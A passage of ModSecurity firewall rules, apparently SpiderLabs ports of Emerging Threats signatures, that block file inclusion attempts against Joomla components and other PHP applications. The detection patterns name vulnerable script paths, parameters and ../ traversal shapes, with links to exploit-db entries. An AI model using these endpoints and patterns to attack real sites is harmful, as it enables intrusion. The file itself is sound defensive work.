"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011140,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jeajaxeventcalendar&" "chain" SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008651) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008651,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6669/'" SecRule &TX:'/RFI.*ARGS:src/' "@gt 0" "chain" SecRule &TX:'/RFI.*ARGS:src/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009508) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /windetail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009508,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34537'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:adtype "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009509) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /detail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009509,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34537'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:adtype "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008822,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6980/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_pro_desk" "chain" SecRule &TX:'/RFI.*ARGS:include_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009369) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /admin.rssreader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009369,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7096/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_live_site/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt SecRule ARGS_NAMES "(?i:target)" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009929,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9706/'" SecRule REQUEST_LINE "@contains /index.php?option=com_album&" "chain" SecRule REQUEST_LINE "@contains Itemid=128&" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009933) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component 'koesubmit.php' Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_koesubmit/koesubmit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009933,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component \'koesubmit.php\' Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.owasp.org/index.php/PHP_File_Inclusion'" SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component \'koesubmit.php\' Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009934) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /components/com_moofaq/includes/file_includer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009934,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8898/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010260) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_ajaxchat/tests/ajcuser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010260,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010474) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_ezine/class/php/d4m_ajax_pagenav.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010474,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37043'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010620) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /acomponents/com_mamboleto/mamboleto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010620,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10369'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mojo/wp-comments-post.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010659,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37179'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mojo/wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010660,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37179'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010780) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mediaslide/viewer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010780,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37440'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_intuit/models/intuit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10730'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:approval "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010848) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_morfeoshow/morfeoshow.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010848,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010942,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11088'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jcollection&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010989) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010989,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37987'" SecRule REQUEST_LINE "@contains /index.php?option=com_ccnewsletter&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010996,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11511'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_communitypolls&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_jcalpro/cal_popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011017,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/joomlajcalpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011067) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011067,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_wgpicasa&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011131) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /administrator/components/com_jwmmxtd/admin.jwmmxtd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011131,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011132) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion SecRule REQUEST_LINE "@contains /administrator/components/com_universal/includes/config/config.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011132,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,38949'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009383,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[mosConfig_absolute_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009384) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009384,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009391) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /com_ongumatimesheet20/lib/onguma.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009391,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6976/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010475) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KR-Web krgourl.php DOCUMENT_ROOT Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /adm/krgourl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010475,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS KR-Web krgourl.php DOCUMENT_ROOT Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/krweb-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DOCUMENT_ROOT/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KR-Web krgourl.php DOCUMENT_ROOT Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010197) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KingCMS menu.php CONFIG Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /include/engine/content/elements/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010197,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS KingCMS menu.php CONFIG Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CONFIG[AdminPath]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KingCMS menu.php CONFIG Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009761) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /include/unverified.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009761,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5179/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:template "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003716) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LaVague Remote Inclusion Attempt -- printbar.php views_path SecRule REQUEST_LINE "@contains /views/print/printbar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003716,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LaVague Remote Inclusion Attempt -- printbar.php views_path',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3870/'" SecRule &TX:'/RFI.*ARGS:views_path/' "@gt 0" 